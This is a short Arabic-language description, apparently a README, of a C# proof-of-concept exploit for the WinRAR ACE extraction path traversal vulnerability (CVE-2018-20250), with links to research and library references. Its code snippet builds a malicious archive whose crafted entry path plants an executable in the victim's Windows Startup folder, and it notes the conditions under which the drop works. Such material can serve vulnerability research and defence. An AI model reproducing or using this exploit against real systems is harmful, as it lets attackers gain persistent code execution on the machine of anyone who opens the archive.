
كود إثبات المفهوم بلغة C# لاستغلال ثغرة مسار استخراج ملفات ACE في WinRAR (CVE-2018-20250).
كود إثبات المفهوم بلغة C# لاستغلال مسار استخراج ملفات ACE في WinRAR (CVE-2018-20250).
https://research.checkpoint.com/extracting-code-execution-from-winrar/ https://github.com/droe/acefile https://apidoc.roe.ch/acefile/latest/
InvertedTomato.Crc (يمكنك تثبيته باستخدام NuGet) لطريقة المجموع الاختباري. يمكنك استخدام أي تطبيق آخر لـ JAMCRC.
AceVolume av = new AceVolume();
AceFile f = new AceFile(
@"D:\some_file.exe",
@"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe"
);
av.AddFile(f);
av.Save("exploit.rar");
يبدو أنه يستخرج فقط إلى مجلد بدء التشغيل عندما يكون ملف .rar على سطح المكتب أو أي مجلد في نفس المستوى.